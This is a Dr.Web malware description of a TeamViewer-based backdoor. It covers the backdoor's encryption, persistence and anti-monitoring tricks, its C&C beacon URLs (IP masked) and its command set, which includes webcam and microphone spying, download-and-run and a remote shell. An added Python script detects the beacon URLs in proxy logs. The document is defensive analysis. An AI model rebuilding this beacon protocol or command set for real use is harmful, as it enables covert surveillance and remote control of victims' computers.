BackDoor.TeamViewerENT.1

Added to the Dr.Web virus database: 2016-08-15

Virus description added:

SHA1:

  • 001c13d05841d2a82229a35fe58235743f1564fe (dropper)
  • 0660cadef21d2061e776e4bcaa6aa4fb48a778be (avicap32.dll)

A backdoor Trojan for Microsoft Windows that is distributed under the name Spy-Agent. It uses components of the TeamViewer remote control utility to spy on users. The Trojan contains three encrypted blocks of executable code, which are decrypted one by one. The first block is encoded with BASE64 and XOR; the other two with BASE64 and RC4.

The Trojan’s payload is placed in the avicap32.dll library. Once launched, the Trojan disables error messaging for the TeamViewer process. After the configuration is read, it is re-encrypted with a local key and saved back to the same location. The Trojan hooks function calls in the TeamViewer address space and sets the attributes “system”, “hidden”, and “read only” on all files in its folder.

The Trojan has a list of TeamViewer file checksums and regularly verifies them using the MapFileAndCheckSumA API function. If files or components required for normal operation of TeamViewer are missing, the Trojan downloads them from its command and control (C&C) server. To ensure its autorun, the Trojan modifies particular branches of the Windows system registry, choosing branches under HKCU or HKLM depending on whether or not the Trojan has administrative privileges.

The Trojan also removes the tvicap32.dll file. It then launches a separate thread that kills TeamViewer processes if it detects that TASKMGR.EXE or PROCEXP.EXE is running.

The backdoor uses additional plug-ins, which have the .pg extension and are stored in the same folder as the Trojan. To launch them, the backdoor enumerates its folder looking for .pg files. If it finds files with this extension, it starts several threads (one per detected file), which decrypt the files using RC4 and load them into memory.

To send a message about the status, the Trojan determines the cursor location and, after some time specified in the configuration, it sends the following request to the command and control server:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&sidl=<cur_time>

Here the address is taken from the configuration, <TV_ID> is the TeamViewer ID, <botId> is a unique ID of the infected computer, and <cur_time> is the current time in the “YYYY-MM-DD hh:mm:ss” format.

Further requests are sent only if the cursor location is changed or if one of the following keys is pressed: VK_RETURN, VK_SPACE, VK_SHIFT. The Trojan then executes the following request:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&eidl=<cur_time>?cidl=<uptime>

Here the address is taken from the configuration, <TV_ID> is the TeamViewer ID, <botId> is a unique ID of the infected computer, <cur_time> is the current time in the “YYYY-MM-DD hh:mm:ss” format, and <uptime> is the time the Trojan has spent in idle mode, in seconds (since the last request was sent to the server).

To get instructions from the server, the Trojan waits for a particular number of seconds and then sends the following request to the server:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&cidl=<uptime>

Here the address is taken from the configuration, <TV_ID> is the TeamViewer ID, <botId> is a unique ID of the infected computer, and <uptime> is the time the Trojan has spent in idle mode, in seconds (since the last request was sent to the server).

The Trojan checks the server’s reply for the “!” character, which marks the beginning of a command. It then splits the reply into an array of lines using ‘;’ and ‘\r’ as separators. The first element of the array is the command.

Once the commands are executed, the following request is sent to the server:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&cmd=&device=2
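The four beacon shapes above share one path and always carry the id and stat parameters, which makes them easy to pick out of proxy logs. The following detection script is an added example, not part of the Dr.Web description; the log format and the host name c2-placeholder.invalid are constructed (the real C&C address is masked in the analysis), and the stage names are my own labels for the sidl, eidl, cidl and cmd beacons.

```python
import re
from urllib.parse import urlparse, parse_qs

# Path and parameter names exactly as given in the analysis; the stage
# labels (status/activity/poll/result) are assumptions for reporting.
GATE_PATH = re.compile(r"/windiws/update/gate\.php$")
STAGE_PARAMS = {"sidl": "status", "eidl": "activity", "cidl": "poll", "cmd": "result"}

# Constructed proxy log: "<timestamp> <client-ip> <url> <http-status>".
SAMPLE_LOG = [
    "2016-08-15T10:00:01 10.0.0.12 http://c2-placeholder.invalid/windiws/update/gate.php?id=123456789&stat=a1b2c3&sidl=2016-08-15%2010:00:00 200",
    "2016-08-15T10:00:02 10.0.0.12 http://example.invalid/update/gate.php?id=1&stat=2 200",
    "2016-08-15T10:05:07 10.0.0.12 http://c2-placeholder.invalid/windiws/update/gate.php?id=123456789&stat=a1b2c3&eidl=2016-08-15%2010:05:00?cidl=300 200",
    "2016-08-15T10:06:00 10.0.0.12 http://c2-placeholder.invalid/windiws/update/gate.php?id=123456789&stat=a1b2c3&cidl=53 200",
    "2016-08-15T10:06:01 10.0.0.12 http://c2-placeholder.invalid/windiws/update/gate.php?id=123456789&stat=a1b2c3&cmd=&device=2 200",
]

def classify_beacon(url):
    """Return a dict describing the beacon, or None if the URL is not one."""
    parsed = urlparse(url)
    if not GATE_PATH.search(parsed.path):
        return None
    # The activity beacon joins its last parameter with '?' instead of '&'
    # (see the eidl request above), so normalise before parsing the query.
    params = parse_qs(parsed.query.replace("?", "&"), keep_blank_values=True)
    if "id" not in params or "stat" not in params:
        return None
    stages = [name for key, name in STAGE_PARAMS.items() if key in params]
    if not stages:
        return None
    # The eidl beacon also carries cidl; report the more specific stage.
    stage = "activity" if "eidl" in params else stages[0]
    return {"host": parsed.hostname, "tv_id": params["id"][0],
            "stat": params["stat"][0], "stage": stage}

def scan_proxy_log(lines):
    """Return a list of (client_ip, beacon) for every matching log line."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        beacon = classify_beacon(parts[2])
        if beacon is not None:
            hits.append((parts[1], beacon))
    return hits

if __name__ == "__main__":
    for client, beacon in scan_proxy_log(SAMPLE_LOG):
        print(client, beacon["stage"], beacon["tv_id"], beacon["stat"], beacon["host"])
```

A single client producing the status, activity and poll stages in sequence is the pattern worth alerting on; the TeamViewer ID and bot ID tie the beacons to one infected host.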

The Trojan can execute the following commands:

Command       Description
shutdown      Restart the computer
poweroff      Turn off the computer
delproc       Remove TeamViewer
restart       Relaunch TeamViewer
startaudio    Start listening through the microphone
stopaudio     Stop listening through the microphone
startvideo    Start viewing via the web camera
stopvideo     Stop viewing via the web camera
lexec         Download a file, save it to a temporary folder (%TEMP%) and run it
updef         Update the configuration file and the backdoor’s executable file
vid           Identify the web camera
cmd           Connect to the specified address, run cmd.exe and redirect its input/output to a remote server
delpg         Remove a plug-in from disk
uppg          Download/update a plug-in
upcfgpg       Replace the configuration file with the one specified in the command
oftvdel       Rename avicap32.dll to tvicap32.dll
noexit        Set the parameter value to 1
cfgaudio      Set the value of the corresponding configuration parameter
cfgvideo      (same as cfgaudio)
cfgnomedia    (same as cfgaudio)
cfghostfile   (same as cfgaudio)
cfgwin7kill   (same as cfgaudio)
cfgxpkill     (same as cfgaudio)
cfgpgkey      (same as cfgaudio)
fakedel       (same as cfgaudio)
cfgpassteam   (same as cfgaudio)
cfg           (same as cfgaudio)
cfgnoexit     (same as cfgaudio)
Cfggenid      (same as cfgaudio)

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and of any removable media you use.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, write it to a USB drive or burn it to a CD/DVD. After booting from this media, run a full scan and cure all the detected threats.